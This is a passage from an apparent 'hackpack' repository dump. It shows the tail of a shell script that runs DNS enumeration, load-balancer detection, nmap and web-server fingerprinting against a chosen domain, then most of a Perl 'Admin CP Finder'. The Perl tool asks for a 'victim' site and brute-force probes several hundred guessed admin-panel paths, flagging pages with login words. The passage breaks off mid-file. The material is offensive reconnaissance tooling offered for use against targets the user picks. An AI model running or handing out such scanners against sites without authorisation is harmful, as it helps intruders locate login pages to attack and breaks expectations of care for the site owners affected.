45 | perl dnsenum.pl --enum -f dns.txt --update a -r $domain
46 | echo
47 | echo "###########################################################################################"
48 | echo
49 | echo dnstracer $domain
50 | echo
51 | dnstracer $domain
52 | echo
53 | echo "###########################################################################################"
54 | echo
55 | echo "cd /pentest/enumeration/fierce"
56 | echo "perl fierce.pl -dns" $domain
57 | echo
58 | cd /pentest/enumeration/fierce
59 | perl fierce.pl -dns $domain
60 | echo
61 | echo "###########################################################################################"
62 | echo
63 | echo "cd /pentest/enumeration/lbd"
64 | echo "./lbd.sh" $domain
65 | cd /pentest/enumeration/lbd
66 | ./lbd.sh $domain
67 | echo "###########################################################################################"
68 | echo
69 | echo "cd /pentest/enumeration/list-urls"
70 | echo "./list-urls.py http://www."$domain
71 | cd /pentest/enumeration/list-urls
72 | ./list-urls.py http://www.$domain
73 | echo
74 | echo "###########################################################################################"
75 | echo
76 | echo "nmap -PN -n -F -T4 -sV -A -oG temp.txt" $domain
77 | cd /root
78 | nmap -PN -n -F -T4 -sV -A -oG temp.txt $domain
79 | echo
80 | echo "###########################################################################################"
81 | echo
82 | echo "amap -i temp.txt"
83 | amap -i temp.txt
84 | echo
85 | echo "###########################################################################################"
86 | echo
87 | echo "cd /pentest/enumeration/www/httprint/linux"
88 | echo "./httprint -h www."$domain "-s signatures.txt -P0"
89 | echo
90 | cd /pentest/enumeration/www/httprint/linux
91 | ./httprint -h www.$domain -s signatures.txt -P0
92 | echo
93 | echo "###########################################################################################"
94 |
--------------------------------------------------------------------------------
/hackpack/hackpack/admin.pl:
--------------------------------------------------------------------------------
1 | #!/usr/bin/perl
2 |
3 | use HTTP::Request;
4 | use LWP::UserAgent;
5 |
6 | system('cls');
7 | system('title Admin CP Finder ');
8 | system "color 0a";
9 | print"\n";
10 | print "\t>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n";
11 | print "\t> Admin CP Finder >\n";
12 | print "\t> Created By CyberToxic1101 >\n";
13 | print "\t> Visit my page on FACEBOOK >\n";
14 | print "\t> https://www.facebook.com/www.kali.org >\n";
15 | print "\t>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n";
16 | print "\n";
17 |
18 | print " Please Enter Site\n Example: www.victim.com or www.victim.com/path\n-> ";
19 | $site=;
20 | chomp $site;
21 |
22 | print "\n";
23 | print " Enter site source code\n\n 1 = php\n 2 = asp\n 3 = aspx\n 4 = cfm\n 5 = js\n 6 = cgi\n 7 = brf\n\n-> ";
24 | $code=;
25 | chomp($code);
26 |
27 | if ( $site !~ /^http:/ ) {
28 | $site = 'http://' . $site;
29 | }
30 | if ( $site !~ /\/$/ ) {
31 | $site = $site . '/';
32 | }
33 | print "\n";
34 |
35 | print "-> Target: $site\n";
36 | print "-> Site source code: $code\n";
37 | print "-> Searching admin cp...\n\n\n";
38 |
39 | if($code eq "2"){
40 |
41 | @path1=('admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
42 | 'memberadmin/','administratorlogin/','adm/','account.asp','admin/account.asp','admin/index.asp','admin/login.asp','admin/admin.asp',
43 | 'admin_area/admin.asp','admin_area/login.asp','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
44 | 'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.asp','bb-admin/index.asp','bb-admin/login.asp','bb-admin/admin.asp',
45 | 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.html','admin.html','admin/cp.html','cp.html',
46 | 'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html',
47 | 'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.html','panel-administracion/login.html',
48 | 'admin/home.asp','admin/controlpanel.asp','admin.asp','pages/admin/admin-login.asp','admin/admin-login.asp','admin-login.asp','admin/cp.asp','cp.asp',
49 | 'administrator/account.asp','administrator.asp','acceso.asp','login.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','administrator/login.asp',
50 | 'moderator/admin.asp','controlpanel.asp','admin/account.html','adminpanel.html','webadmin.html','pages/admin/admin-login.html','admin/admin-login.html',
51 | 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.asp','user.html','admincp/index.asp','admincp/login.asp','admincp/index.html',
52 | 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html',
53 | 'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admin/admin_login.html',
54 | 'admincontrol/login.html','adm/index.html','adm.html','admincontrol.asp','admin/account.asp','adminpanel.asp','webadmin.asp','webadmin/index.asp',
55 | 'webadmin/admin.asp','webadmin/login.asp','admin/admin_login.asp','admin_login.asp','panel-administracion/login.asp','adminLogin.asp',
56 | 'admin/adminLogin.asp','home.asp','admin.asp','adminarea/index.asp','adminarea/admin.asp','adminarea/login.asp','admin-login.html',
57 | 'panel-administracion/index.asp','panel-administracion/admin.asp','modelsearch/index.asp','modelsearch/admin.asp','administrator/index.asp',
58 | 'admincontrol/login.asp','adm/admloginuser.asp','admloginuser.asp','admin2.asp','admin2/login.asp','admin2/index.asp','adm/index.asp',
59 | 'adm.asp','affiliate.asp','adm_auth.asp','memberadmin.asp','administratorlogin.asp','siteadmin/login.asp','siteadmin/index.asp','siteadmin/login.html'
60 | );
61 |
62 | foreach $ways(@path1){
63 |
64 | $final=$site.$ways;
65 |
66 | my $req=HTTP::Request->new(GET=>$final);
67 | my $ua=LWP::UserAgent->new();
68 | $ua->timeout(30);
69 | my $response=$ua->request($req);
70 |
71 | if($response->content =~ /Username/ ||
72 | $response->content =~ /Password/ ||
73 | $response->content =~ /username/ ||
74 | $response->content =~ /password/ ||
75 | $response->content =~ /USERNAME/ ||
76 | $response->content =~ /PASSWORD/ ||
77 | $response->content =~ /Username/ ||
78 | $response->content =~ /Wachtwoord/ ||
79 | $response->content =~ /Senha/ ||
80 | $response->content =~ /senha/ ||
81 | $response->content =~ /Personal/ ||
82 | $response->content =~ /Usuario/ ||
83 | $response->content =~ /Clave/ ||
84 | $response->content =~ /Usager/ ||
85 | $response->content =~ /usager/ ||
86 | $response->content =~ /Sing/ ||
87 | $response->content =~ /passe/ ||
88 | $response->content =~ /P\/W/ ||
89 | $response->content =~ /Admin Password/
90 | ){
91 | print " \n [+] Found -> $final\n\n";
92 | }else{
93 | print "[-] Not Found <- $final\n";
94 | }
95 | }
96 | }
97 |
98 | if($code eq "1"){
99 |
100 | @path2=('admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
101 | 'memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/admin.php','admin/account.php',
102 | 'admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
103 | 'admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html',
104 | 'admin/controlpanel.php','admin.php','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
105 | 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
106 | 'admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php',
107 | 'administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php',
108 | 'bb-admin/index.html','bb-admin/login.html','acceso.php','bb-admin/admin.html','admin/home.html','login.php','modelsearch/login.php','moderator.php','moderator/login.php',
109 | 'moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php',
110 | 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','adminarea/index.html','adminarea/admin.html',
111 | 'webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.html',
112 | 'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
113 | 'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
114 | 'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpanel.html','admincontrol.html',
115 | 'panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','admin.php','adminarea/index.php',
116 | 'adminarea/admin.php','adminarea/login.php','panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php',
117 | 'modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php','usuarios/login.php',
118 | 'adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php'
119 | );
120 |
121 | foreach $ways(@path2){
122 |
123 | $final=$site.$ways;
124 |
125 | my $req=HTTP::Request->new(GET=>$final);
126 | my $ua=LWP::UserAgent->new();
127 | $ua->timeout(30);
128 | my $response=$ua->request($req);
129 |
130 | if($response->content =~ /Username/ ||
131 | $response->content =~ /Password/ ||
132 | $response->content =~ /username/ ||
133 | $response->content =~ /password/ ||
134 | $response->content =~ /USERNAME/ ||
135 | $response->content =~ /PASSWORD/ ||
136 | $response->content =~ /Username/ ||
137 | $response->content =~ /Wachtwoord/ ||
138 | $response->content =~ /Senha/ ||
139 | $response->content =~ /senha/ ||
140 | $response->content =~ /Personal/ ||
141 | $response->content =~ /Usuario/ ||
142 | $response->content =~ /Clave/ ||
143 | $response->content =~ /Usager/ ||
144 | $response->content =~ /usager/ ||
145 | $response->content =~ /Sing/ ||
146 | $response->content =~ /passe/ ||
147 | $response->content =~ /P\/W/ ||
148 | $response->content =~ /Admin Password/
149 | ){
150 | print " \n [+] Found -> $final\n\n";
151 | }else{
152 | print "[-] Not Found <- $final\n";
153 | }
154 | }
155 | }
156 |
157 |
158 | if($code eq "4"){
159 |
160 | @path2=('admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
161 | 'memberadmin/','administratorlogin/','adm/','admin/account.cfm','admin/index.cfm','admin/login.cfm','admin/admin.cfm','admin/account.cfm',
162 | 'admin_area/admin.cfm','admin_area/login.cfm','siteadmin/login.cfm','siteadmin/index.cfm','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
163 | 'admin_area/index.cfm','bb-admin/index.cfm','bb-admin/login.cfm','bb-admin/admin.cfm','admin/home.cfm','admin_area/login.html','admin_area/index.html',
164 | 'admin/controlpanel.cfm','admin.cfm','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
165 | 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
166 | 'admin/cp.cfm','cp.cfm','administrator/index.cfm','administrator/login.cfm','nsw/admin/login.cfm','webadmin/login.cfm','admin/admin_login.cfm','admin_login.cfm',
167 | 'administrator/account.cfm','administrator.cfm','admin_area/admin.html','pages/admin/admin-login.cfm','admin/admin-login.cfm','admin-login.cfm',
168 | 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.cfm','modelsearch/login.cfm','moderator.cfm','moderator/login.cfm',
169 | 'moderator/admin.cfm','account.cfm','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.cfm','admincontrol.cfm',
170 | 'admin/adminLogin.html','acceso.cfm','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.cfm','adminarea/index.html','adminarea/admin.html',
171 | 'webadmin.cfm','webadmin/index.cfm','webadmin/admin.cfm','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.cfm','moderator.html',
172 | 'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
173 | 'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
174 | 'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.cfm','account.html','controlpanel.html','admincontrol.html',
175 | 'panel-administracion/login.cfm','wp-login.cfm','adminLogin.cfm','admin/adminLogin.cfm','home.cfm','admin.cfm','adminarea/index.cfm',
176 | 'adminarea/admin.cfm','adminarea/login.cfm','panel-administracion/index.cfm','panel-administracion/admin.cfm','modelsearch/index.cfm',
177 | 'modelsearch/admin.cfm','admincontrol/login.cfm','adm/admloginuser.cfm','admloginuser.cfm','admin2.cfm','admin2/login.cfm','admin2/index.cfm','usuarios/login.cfm',
178 | 'adm/index.cfm','adm.cfm','affiliate.cfm','adm_auth.cfm','memberadmin.cfm','administratorlogin.cfm'
179 | );
180 |
181 | foreach $ways(@path2){
182 |
183 | $final=$site.$ways;
184 |
185 | my $req=HTTP::Request->new(GET=>$final);
186 | my $ua=LWP::UserAgent->new();
187 | $ua->timeout(30);
188 | my $response=$ua->request($req);
189 |
190 | if($response->content =~ /Username/ ||
191 | $response->content =~ /Password/ ||
192 | $response->content =~ /username/ ||
193 | $response->content =~ /password/ ||
194 | $response->content =~ /USERNAME/ ||
195 | $response->content =~ /PASSWORD/ ||
196 | $response->content =~ /Username/ ||
197 | $response->content =~ /Wachtwoord/ ||
198 | $response->content =~ /Senha/ ||
199 | $response->content =~ /senha/ ||
200 | $response->content =~ /Personal/ ||
201 | $response->content =~ /Usuario/ ||
202 | $response->content =~ /Clave/ ||
203 | $response->content =~ /Usager/ ||
204 | $response->content =~ /usager/ ||
205 | $response->content =~ /Sing/ ||
206 | $response->content =~ /passe/ ||
207 | $response->content =~ /P\/W/ ||
208 | $response->content =~ /Admin Password/
209 | ){
210 | print " \n [+] Found -> $final\n\n";
211 | }else{
212 | print "[-] Not Found <- $final\n";
213 | }
214 | }
215 | }
216 |
217 | if($code eq "3"){
218 |
219 | @path2=('admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
220 | 'memberadmin/','administratorlogin/','adm/','admin/account.aspx','admin/index.aspx','admin/login.aspx','admin/admin.aspx','admin/account.aspx',
221 | 'admin_area/admin.aspx','admin_area/login.aspx','siteadmin/login.aspx','siteadmin/index.aspx','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
222 | 'admin_area/index.aspx','bb-admin/index.aspx','bb-admin/login.aspx','bb-admin/admin.aspx','admin/home.aspx','admin_area/login.html','admin_area/index.html',
223 | 'admin/controlpanel.aspx','admin.aspx','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
224 | 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
225 | 'admin/cp.aspx','cp.aspx','administrator/index.aspx','administrator/login.aspx','nsw/admin/login.aspx','webadmin/login.aspx','admin/admin_login.aspx','admin_login.aspx',
226 | 'administrator/account.aspx','administrator.aspx','admin_area/admin.html','pages/admin/admin-login.aspx','admin/admin-login.aspx','admin-login.aspx',
227 | 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.aspx','modelsearch/login.aspx','moderator.aspx','moderator/login.aspx',
228 | 'moderator/admin.aspx','acceso.aspx','account.aspx','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.aspx','admincontrol.aspx',
229 | 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.aspx','adminarea/index.html','adminarea/admin.html',
230 | 'webadmin.aspx','webadmin/index.aspx','webadmin/admin.aspx','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.aspx','moderator.html',
231 | 'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
232 | 'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
233 | 'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.aspx','account.html','controlpanel.html','admincontrol.html',
234 | 'panel-administracion/login.aspx','wp-login.aspx','adminLogin.aspx','admin/adminLogin.aspx','home.aspx','admin.aspx','adminarea/index.aspx',
235 | 'adminarea/admin.aspx','adminarea/login.aspx','panel-administracion/index.aspx','panel-administracion/admin.aspx','modelsearch/index.aspx',
236 | 'modelsearch/admin.aspx','admincontrol/login.aspx','adm/admloginuser.aspx','admloginuser.aspx','admin2.aspx','admin2/login.aspx','admin2/index.aspx','usuarios/login.aspx',
237 | 'adm/index.aspx','adm.aspx','affiliate.aspx','adm_auth.aspx','memberadmin.aspx','administratorlogin.aspx'
238 | );
239 |
240 | foreach $ways(@path2){
241 |
242 | $final=$site.$ways;
243 |
244 | my $req=HTTP::Request->new(GET=>$final);
245 | my $ua=LWP::UserAgent->new();
246 | $ua->timeout(30);
247 | my $response=$ua->request($req);
248 |
249 | if($response->content =~ /Username/ ||
250 | $response->content =~ /Password/ ||
251 | $response->content =~ /username/ ||
252 | $response->content =~ /password/ ||
253 | $response->content =~ /USERNAME/ ||
254 | $response->content =~ /PASSWORD/ ||
255 | $response->content =~ /Username/ ||
256 | $response->content =~ /Wachtwoord/ ||
257 | $response->content =~ /Senha/ ||
258 | $response->content =~ /senha/ ||
259 | $response->content =~ /Personal/ ||
260 | $response->content =~ /Usuario/ ||
261 | $response->content =~ /Clave/ ||
262 | $response->content =~ /Usager/ ||
263 | $response->content =~ /usager/ ||
264 | $response->content =~ /Sing/ ||
265 | $response->content =~ /passe/ ||
266 | $response->content =~ /P\/W/ ||
267 | $response->content =~ /Admin Password/
268 | ){
269 | print " \n [+] Found -> $final\n\n";
270 | }else{
271 | print "[-] Not Found <- $final\n";
272 | }
273 | }
274 | }
275 |
276 |
277 | if($code eq "5"){
278 |
279 | @path2=('admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
280 | 'memberadmin/','administratorlogin/','adm/','admin/account.js','admin/index.js','admin/login.js','admin/admin.js','admin/account.js',
281 | 'admin_area/admin.js','admin_area/login.js','siteadmin/login.js','siteadmin/index.js','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
282 | 'admin_area/index.js','bb-admin/index.js','bb-admin/login.js','bb-admin/admin.js','admin/home.js','admin_area/login.html','admin_area/index.html',
283 | 'admin/controlpanel.js','admin.js','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
284 | 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
285 | 'admin/cp.js','cp.js','administrator/index.js','administrator/login.js','nsw/admin/login.js','webadmin/login.js','admin/admin_login.js','admin_login.js',
286 | 'administrator/account.js','administrator.js','admin_area/admin.html','pages/admin/admin-login.js','admin/admin-login.js','admin-login.js',
287 | 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.js','modelsearch/login.js','moderator.js','moderator/login.js',
288 | 'moderator/admin.js','account.js','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.js','admincontrol.js',
289 | 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.js','adminarea/index.html','adminarea/admin.html',
290 | 'webadmin.js','webadmin/index.js','acceso.js','webadmin/admin.js','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.js','moderator.html',
291 | 'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
292 | 'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
293 | 'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.js','account.html','controlpanel.html','admincontrol.html',
294 | 'panel-administracion/login.js','wp-login.js','adminLogin.js','admin/adminLogin.js','home.js','admin.js','adminarea/index.js',
295 | 'adminarea/admin.js','adminarea/login.js','panel-administracion/index.js','panel-administracion/admin.js','modelsearch/index.js',
296 | 'modelsearch/admin.js','admincontrol/login.js','adm/admloginuser.js','admloginuser.js','admin2.js','admin2/login.js','admin2/index.js','usuarios/login.js',
297 | 'adm/index.js','adm.js','affiliate.js','adm_auth.js','memberadmin.js','administratorlogin.js'
298 | );
299 |
300 | foreach $ways(@path2){
301 |
302 | $final=$site.$ways;
303 |
304 | my $req=HTTP::Request->new(GET=>$final);
305 | my $ua=LWP::UserAgent->new();
306 | $ua->timeout(30);
307 | my $response=$ua->request($req);
308 |
309 | if($response->content =~ /Username/ ||
310 | $response->content =~ /Password/ ||
311 | $response->content =~ /username/ ||
312 | $response->content =~ /password/ ||
313 | $response->content =~ /USERNAME/ ||
314 | $response->content =~ /PASSWORD/ ||
315 | $response->content =~ /Username/ ||
316 | $response->content =~ /Wachtwoord/ ||
317 | $response->content =~ /Senha/ ||
318 | $response->content =~ /senha/ ||
319 | $response->content =~ /Personal/ ||
320 | $response->content =~ /Usuario/ ||
321 | $response->content =~ /Clave/ ||
322 | $response->content =~ /Usager/ ||
323 | $response->content =~ /usager/ ||
324 | $response->content =~ /Sing/ ||
325 | $response->content =~ /passe/ ||
326 | $response->content =~ /P\/W/ ||
327 | $response->content =~ /Admin Password/
328 | ){
329 | print " \n [+] Found -> $final\n\n";
330 | }else{
331 | print "[-] Not Found <- $final\n";
332 | }
333 | }
334 | }
335 |
336 | if($code eq "6"){
337 |
338 | @path2=('admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
339 | 'memberadmin/','administratorlogin/','adm/','admin/account.cgi','admin/index.cgi','admin/login.cgi','admin/admin.cgi','admin/account.cgi',
340 | 'admin_area/admin.cgi','admin_area/login.cgi','siteadmin/login.cgi','siteadmin/index.cgi','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
341 | 'admin_area/index.cgi','bb-admin/index.cgi','bb-admin/login.cgi','bb-admin/admin.cgi','admin/home.cgi','admin_area/login.html','admin_area/index.html',
342 | 'admin/controlpanel.cgi','admin.cgi','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
343 | 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
344 | 'admin/cp.cgi','cp.cgi','administrator/index.cgi','administrator/login.cgi','nsw/admin/login.cgi','webadmin/login.cgi','admin/admin_login.cgi','admin_login.cgi',
345 | 'administrator/account.cgi','administrator.cgi','admin_area/admin.html','pages/admin/admin-login.cgi','admin/admin-login.cgi','admin-login.cgi',
346 | 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.cgi','modelsearch/login.cgi','moderator.cgi','moderator/login.cgi',
347 | 'moderator/admin.cgi','account.cgi','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.cgi','admincontrol.cgi',
348 | 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.cgi','adminarea/index.html','adminarea/admin.html',
349 | 'webadmin.cgi','webadmin/index.cgi','acceso.cgi','webadmin/admin.cgi','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.cgi','moderator.html',
350 | 'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
351 | 'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
352 | 'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.cgi','account.html','controlpanel.html','admincontrol.html',
353 | 'panel-administracion/login.cgi','wp-login.cgi','adminLogin.cgi','admin/adminLogin.cgi','home.cgi','admin.cgi','adminarea/index.cgi',
354 | 'adminarea/admin.cgi','adminarea/login.cgi','panel-administracion/index.cgi','panel-administracion/admin.cgi','modelsearch/index.cgi',
355 | 'modelsearch/admin.cgi','admincontrol/login.cgi','adm/admloginuser.cgi','admloginuser.cgi','admin2.cgi','admin2/login.cgi','admin2/index.cgi','usuarios/login.cgi',
356 | 'adm/index.cgi','adm.cgi','affiliate.cgi','adm_auth.cgi','memberadmin.cgi','administratorlogin.cgi'
357 | );
358 |
359 | foreach $ways(@path2){
360 |
361 | $final=$site.$ways;
362 |
363 | my $req=HTTP::Request->new(GET=>$final);
364 | my $ua=LWP::UserAgent->new();
365 | $ua->timeout(30);
366 | my $response=$ua->request($req);
367 |
368 | if($response->content =~ /Username/ ||
369 | $response->content =~ /Password/ ||
370 | $response->content =~ /username/ ||
371 | $response->content =~ /password/ ||
372 | $response->content =~ /USERNAME/ ||
373 | $response->content =~ /PASSWORD/ ||
374 | $response->content =~ /Username/ ||
375 | $response->content =~ /Wachtwoord/ ||
376 | $response->content =~ /Senha/ ||
377 | $response->content =~ /senha/ ||
378 | $response->content =~ /Personal/ ||
379 | $response->content =~ /Usuario/ ||
380 | $response->content =~ /Clave/ ||
381 | $response->content =~ /Usager/ ||
382 | $response->content =~ /usager/ ||
383 | $response->content =~ /Sing/ ||
384 | $response->content =~ /passe/ ||
385 | $response->content =~ /P\/W/ ||
386 | $response->content =~ /Admin Password/
387 | ){
388 | print " \n [+] Found -> $final\n\n";
389 | }else{
390 | print "[-] Not Found <- $final\n";
391 | }
392 | }
393 | }
394 |
395 |
396 | if($code eq "7"){
397 |
398 | @path2=('admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
399 | 'memberadmin/','administratorlogin/','adm/','admin/account.brf','admin/index.brf','admin/login.brf','admin/admin.brf','admin/account.brf',
400 | 'admin_area/admin.brf','admin_area/login.brf','siteadmin/login.brf','siteadmin/index.brf','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
401 | 'admin_area/index.brf','bb-admin/index.brf','bb-admin/login.brf','bb-admin/admin.brf','admin/home.brf','admin_area/login.html','admin_area/index.html',
402 | 'admin/controlpanel.brf','admin.brf','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
403 | 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
404 | 'admin/cp.brf','cp.brf','administrator/index.brf','administrator/login.brf','nsw/admin/login.brf','webadmin/login.brfbrf','admin/admin_login.brf','admin_login.brf',
405 | 'administrator/account.brf','administrator.brf','acceso.brf','admin_area/admin.html','pages/admin/admin-login.brf','admin/admin-login.brf','admin-login.brf',
406 | 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.brf','modelsearch/login.brf','moderator.brf','moderator/login.brf',
407 | 'moderator/admin.brf','account.brf','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.brf','admincontrol.brf',
408 | 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.brf','adminarea/index.html','adminarea/admin.html',
409 | 'webadmin.brf','webadmin/index.brf','webadmin/admin.brf','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.brf','moderator.html',
410 | 'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
411 | 'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
412 | 'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.brf','account.html','controlpanel.html','admincontrol.html',
413 | 'panel-administracion/login.brf','wp-login.brf','adminLogin.brf','admin/adminLogin.brf','home.brf','admin.brf','adminarea/index.brf',
414 | 'adminarea/admin.brf','adminarea/login.brf','panel-administracion/index.brf','panel-administracion/admin.brf','modelsearch/index.brf',
415 | 'modelsearch/admin.brf','admincontrol/login.brf','adm/admloginuser.brf','admloginuser.brf','admin2.brf','admin2/login.brf','admin2/index.brf','usuarios/login.brf',
416 | 'adm/index.brf','adm.brf','affiliate.brf','adm_auth.brf','memberadmin.brf','administratorlogin.brf'
417 | );
418 |
419 | foreach $ways(@path2){
420 |
421 | $final=$site.$ways;
422 |
423 | my $req=HTTP::Request->new(GET=>$final);
424 | my $ua=LWP::UserAgent->new();
425 | $ua->timeout(30);
426 | my $response=$ua->request($req);
427 |
428 | if($response->content =~ /Username/ ||
429 | $response->content =~ /Password/ ||
430 | $response->content =~ /username/ ||
431 | $response->content =~ /password/ ||
432 | $response->content =~ /USERNAME/ ||
433 | $response->content =~ /PASSWORD/ ||
434 | $response->content =~ /Username/ ||
435 | $response->content =~ /Wachtwoord/ ||
436 | $response->content =~ /Senha/ ||
437 | $response->content =~ /senha/ ||
438 | $response->content =~ /Personal/ ||
439 | $response->content =~ /Usuario/ ||
440 | $response->content =~ /Clave/ ||
